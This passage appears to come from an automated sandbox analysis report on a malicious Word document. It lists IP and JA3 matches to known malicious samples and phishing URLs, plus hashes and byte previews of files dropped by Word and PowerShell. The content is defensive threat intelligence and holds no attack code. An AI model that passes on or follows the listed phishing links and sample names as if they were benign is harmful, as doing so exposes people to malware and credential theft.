                                AMAZON-02USemotet.docGet hashmaliciousBrowse
                                • 76.223.26.96
                                https://moddex-ltd.odoo.com/dguqh49fwdvef0h6xsdifwvgx3k4zGet hashmaliciousBrowse
                                • 13.225.80.50
                                https://pat.nuph.edu.ua/redirection/2/?bGlvbmVsLmphbkBhdWItc2FudGUuZnINGet hashmaliciousBrowse
                                • 54.154.193.86
                                3ML0rBGt2E.exeGet hashmaliciousBrowse
                                • 104.192.141.1
                                FOB.xlsxGet hashmaliciousBrowse
                                • 3.1.221.201
                                sxNl6OeOPIJyE9q.exeGet hashmaliciousBrowse
                                • 52.31.80.183
                                December Po034333.exeGet hashmaliciousBrowse
                                • 3.139.227.98
                                http://secure-file-transfer-ver.webflow.ioGet hashmaliciousBrowse
                                • 143.204.10.74
                                https://www.evernote.com/shard/s388/sh/9c47779f-4cca-4ce6-ac44-541ac5f1d3bc/b1c9d6f77076f60f846a4fee1797af69&d=DwMGaQGet hashmaliciousBrowse
                                • 13.224.194.53
                                https://teams-securelink-flow-docs.webflow.io/Get hashmaliciousBrowse
                                • 13.224.194.16
                                https://criswellauto-my.sharepoint.com/:b:/p/jtan/EU06P7jwOKFJoP-tIPrljMMBEG3gKDGg6TlM9-QtbrOOKg?e=N4aC2pGet hashmaliciousBrowse
                                • 35.181.18.61
                                http://www.authorea.com/496817/s_HUCBQs4gOQpqvMdvqmFQGet hashmaliciousBrowse
                                • 13.224.89.119
                                https://0000000000.doodlekit.com/Get hashmaliciousBrowse
                                • 13.224.101.41
                                https://www.rencentro.com/m0355/Get hashmaliciousBrowse
                                • 13.224.93.112
                                s1qMnxSMaD.exeGet hashmaliciousBrowse
                                • 3.134.125.175
                                https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fwww.mmsend19.com%2flink.cfm%3fr%3dTu374LhXBNA30Zya2M-1fg~~%26pe%3dj0r_9ysA6YUbQvHrDWJvh4Gx3YMu9AdRMZEN44LMtLmQjQ0-TtHHHXpzASqyDmEe5cSY4BozMo4XVY8-hiIbYw~~%26t%3do9GzGv-vmd7tYWYjFNU5Vw~~&c=E,1,1nULVlJA3IOTIOEX1u43G-OCfx5S_AfwCu5J8UVK4lgRPcoKfBgNK5uoXGBQG77lv9Uag4Iipn_iaYcgX4-k5YCMu5cSfYlN9clrAhtc8EZ29z6Fsw,,&typo=1Get hashmaliciousBrowse
                                • 35.156.174.8
                                Order Specifications With Ref Breve#T0876B96.exeGet hashmaliciousBrowse
                                • 52.58.78.16
                                http://fx19827c.zizera.com/fx19827c/publisher/login?r=/fx19827c/lite/Get hashmaliciousBrowse
                                • 13.224.93.55
                                PI. NO. 13420 CONFIRMATION BANK DETAILS_pdf.exeGet hashmaliciousBrowse
                                • 3.134.22.63
                                Breve-Tufvassons sp.o.o Company Profile And Bout Us.exeGet hashmaliciousBrowse
                                • 52.33.207.7

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                54328bd36c14bd82ddaa0c04b25ed9adoriginaldocuments.xlsGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                FarEastSingapore_QuoteRequest02122020.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                Bank paymentcopy001#pdf.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                z4VXxCQ0wa.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                1Lp42NHXg7.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                SecuriteInfo.com.Variant.Razy.799731.17017.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                officialdoc!_013_2020.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                urXFLGgIxo.xlsGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                IntegrationTest_7.7.2_Soft32.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                204b06a6fda0320aa7b52fee312dd508.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                Purchase Order.0006765.Scan.pdf...exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                ACVi5thpc2g7rav.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                shipping documents.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                SUO0998900.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                RFQ Spec.xlsGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                new order.xlsGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                ST-069741XLS.ISO.xlsGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                b46rhYLlgB.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                ORDER PURCHASE.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219
                                MV HONESTY.exeGet hashmaliciousBrowse
                                • 172.67.180.202
                                • 173.198.248.218
                                • 103.224.212.219

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\284.exe
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
                                Category:dropped
                                Size (bytes):27021
                                Entropy (8bit):5.645084242567306
                                Encrypted:false
                                SSDEEP:768:C7YThIxTNG5CxLU1jEyHlk01DEnh1TGPPBAxpp:CkThaxG5EUBIOPPy
                                MD5:9738BDD94A0B4B81154B27CD96A9AE02
                                SHA1:14AD2671969BB3227C1394C68BA9A5C695DC0E1A
                                SHA-256:BE2843A9982F822DEEC27945CB5CA1CC183EEA71D361CBE2DCE93406F08A8214
                                SHA-512:DF43021233273F1191082AFBF4BA8997C5E32C2798223EB8173D3A3FFF5478069AE722C45C75433603FA5F7C5EFEFE3CE4774E7C4746B098DF8BB45E46DB8C88
                                Malicious:false
                                Reputation:low
                                Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://blockchainjoblist.com/px.js?ch=1"></script><script type="text/javascript" src="http://blockchainjoblist.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://blockchainjoblist.com/sk-logabpstatus.php?a=OUYxY2s4RndLc0RVbkQxazhBbjBCNHgxeEpxWFRUTXh1V1U4SCtRZ1lxVXJSMWx1QVIxUllQSVdVTjBtMjdUZkhKY05LQ0IzbzdRSnJwYWtEc08vWUNXaGlLS1FQeDhQOEltUm80NHFxU1k9&b="+abp;document.body.appendChild(imglog);if(typeof abperurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='13017' b='15045' c='blockchainjoblist.com' d='entity_mapped'" /><title>Blockchainjoblist.com</title>..<meta http-equiv=
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\141ED612.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Reputation:low
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\17DCA2D9.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.71069630917428
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gw24RkUssVWlsW6A6lsW6X:MQe/yp058QYHahnzSNw2QccAOcAWztl
                                MD5:C1F138C3F19B5545D60B3B5D4C2BA4FC
                                SHA1:BB533340F69A733CF16F921F249729A108A76ED5
                                SHA-256:80C4552EC9FED881E1806AA55368D3428832F52157AB8D92E7FB531658961A3E
                                SHA-512:04F18BE3950586BC4B142A39F52C1AE648666FC9D30D91F37547FBFA2AD857C1A76C20C21B82BE5EF9F11F36AAAA6A365EB6092E0FB3B012FBC0D40575C692A5
                                Malicious:false
                                Reputation:low
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g.."..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\18F49F0D.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Reputation:low
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1C39038.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.759655948601243
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gw24RkUssVWlsW6A6lsZ:t/ve/yp058QYHahnzSNw2QccAOcAWztl
                                MD5:E6FC21E06D4C1D2DD72A8D2D58BC9582
                                SHA1:972D4935EF09CB8351B206A8CF112C6C5F847F49
                                SHA-256:52FBAD38CD46CBBB7B0F1978BE53A747AEC181DE14CD232B41C101A355AE8385
                                SHA-512:85672825C88075CBA61C4FAF09B7AC8F323AC33D472C97690DE705F697A2CE7E419AF7B6ED24FE7BD6F9E838DE01F711AB2AB1B5EFFF5F0C5C6E70221707038F
                                Malicious:false
                                Reputation:low
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g.."..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\29BEE34F.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.701393983592885
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwQYAhUssVWlsW6A6lsW6X:MQe/yp058QYHahnzSNwFccAOcAWztl
                                MD5:B2B55276284D41BAA290155CB55A94E2
                                SHA1:470207680518F7B1241178222EC5FC51F8A46D19
                                SHA-256:C08D5EC45948BDE7FBA129C2BD1A6BF2816015DA7BC0B8BC76DE8F8F3727D2CD
                                SHA-512:0A35421B2C0E00AB17FBDD520EFCEE09EB28602546D365937B987727C29DB50717E00082B4DE927625A7E6CC9407F038F4EB65E107E0BA8FBDFA758F5AA303C1
                                Malicious:false
                                Reputation:low
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g(."..j...I.u@..u..f,....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2A6EFBE8.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.742455865612709
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwQ7/UssVWlsW6A6lsWS:t/ve/yp058QYHahnzSNwDccAOcAWztl
                                MD5:D37BE59408B3ADFAB9601498FB803F74
                                SHA1:BA22B91A98AEFB699AFB1164E8036B790934F1F9
                                SHA-256:AE03083A572DE4A07DDD4D80C4907E7C87AD8B648B46E8FB0910DCF56AF3DF2C
                                SHA-512:7E30A7D1A7315FF6F8F4B98563CFA5432307740F24BF571AD49DDB105BF3380087110991BF1E92AB0E70EF67FC056AB94A75C7151D982B00454767F88D318113
                                Malicious:false
                                Reputation:low
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g..!..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2B700E64.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Reputation:low
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2D6DD3B4.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.7524764961724015
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwajk6SUssVWlsW6A6lA:t/ve/yp058QYHahnzSNwBiccAOcAWztl
                                MD5:F1D393C155C695AD8A0B331F2BA6E32B
                                SHA1:0F8DCF019E5B7CAF0D13CDB0B55834D721613FA1
                                SHA-256:545AFEBE25D1B68C5F7DA4B4C8E531BF678C146EF6137E971EAFB0D784FEB1B5
                                SHA-512:B4036CF05AC66412A544E81C31AEC13E29DFC57204F670107250061D6800F02D635353BDE99B86D7D33471BD66A0A0F4607BF9EB2EF9DCB6C576465E2DE0EB26
                                Malicious:false
                                Reputation:low
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..gH.!..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\33F2261D.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\369E0AEB.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3C06A751.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.6895796661237696
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwrHB7UssVWlsW6A6lsW6X:MQe/yp058QYHahnzSNwT+ccAOcAWztl
                                MD5:6226781EE2D60A4D68B56699B7815ABB
                                SHA1:AB398C560BAF27C1EF96F645225664BFD7A07DEE
                                SHA-256:B253BEDFD4FC10977A663F47D6FA0D1CE9AFD6F79E238732FD6AB01E99B5766D
                                SHA-512:135D57AB92904FDC9B876CFB36A2D2B29504B297E959A77A17E3D0157343F5C80F32041E1B0D56D0DF411B2039E608F81623674C9B2A5EB385CE71045C2743B0
                                Malicious:false
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g.."..j...I.u@..uo.f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3CD7027B.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\40A24090.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.739357714353079
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwrHB7UssVWlsW6A6lsZ:t/ve/yp058QYHahnzSNwT+ccAOcAWztl
                                MD5:3693E695FD2F260F1D969F424DB4F0EF
                                SHA1:BD1B29FADF50A175F1327F5C3515E1F6B2E5FA34
                                SHA-256:581B5A4EB108D4E04E56E8F0F4F9B55DE5BDDA1255717E788007593477FEEE46
                                SHA-512:594B86807A1DFBBED23C565122709F570ABDB67BE31FCF3D986873C9AA36B539D6396852443097A95C5A2999A1181B037F826C5EA1D70FD9168CFB848D087D3B
                                Malicious:false
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g.."..j...I.u@..uo.f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\41FEFB33.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\42309315.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\441041AA.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4A2A591A.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.7508063910791196
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwYL4UssVWlsW6A6lsWS:t/ve/yp058QYHahnzSNwSccAOcAWztl
                                MD5:47494691A7204F143E5910EF1947C99E
                                SHA1:5B455542CDF90C122AB58E543E89A1B6821F0CFC
                                SHA-256:CDFB8B2FF4202BC86346915D1EBDE4E45AB67E40E50EE8D0529D4D7FC4EEC759
                                SHA-512:6F1D6E22D526425045136F5F0C92D087B95412FEFFE5A2A1A74FD8661CAACD91C74E432675091725F6B270B247BB24D1CBCAC0CD477667A8844C8BA35308C638
                                Malicious:false
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g..".\....I.u@..u..fk....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\56F0F38C.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5730E253.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.701393983592885
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwYL4UssVWlsW6A6lsW6A8:MQe/yp058QYHahnzSNwSccAOcAWztl
                                MD5:48D1B152FC6F014B9C45DBB5A7941F4D
                                SHA1:7E5490EAB9418FBC8B4005A97ECCB7ABC096004F
                                SHA-256:61CBDA84CEB5254E134CB6F59EA9D73812B48EF380298D53AEE6CC09BAA966F3
                                SHA-512:B303C1039E1B49B6298DA071A52FDDAB623E1D32E6E4B2FD1F827F522E14868440F95991B63EBAA526F8ADE520D6EEF948BD8AAC102FA044FF192847B5192E08
                                Malicious:false
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g..".\....I.u@..u..fk....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5AC30F31.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
